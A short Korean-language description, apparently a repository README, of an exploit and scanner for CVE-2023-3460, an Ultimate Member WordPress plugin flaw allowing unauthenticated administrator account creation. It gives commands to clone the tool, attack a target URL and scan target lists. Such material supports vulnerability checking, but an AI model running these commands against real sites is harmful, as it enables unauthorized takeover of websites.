
CVE-2023-3460에 대한 익스플로잇 및 스캐너로, WordPress Ultimate Member 플러그인의 권한 상승 취약점으로 인증되지 않은 관리자 계정 생성이 가능합니다.
Ultimate Member WordPress 플러그인 버전 2.6.7 이전에는 방문자가 임의의 권한으로 사용자 계정을 생성하는 것을 막지 못하므로, 공격자가 마음대로 관리자 계정을 생성할 수 있습니다. 이 스크립트는 이 취약점을 악용하여 다양한 대상을 스캔하고 취약점이 있는지 확인합니다.
git clone https://github.com/diego-tella/CVE-2023-3460/
cd CVE-2023-3460/
python exploit.py
python exploit.py -t http://target.com/wordpress #기본 사용법
python exploit.py -c -l list.txt #대상 목록 스캔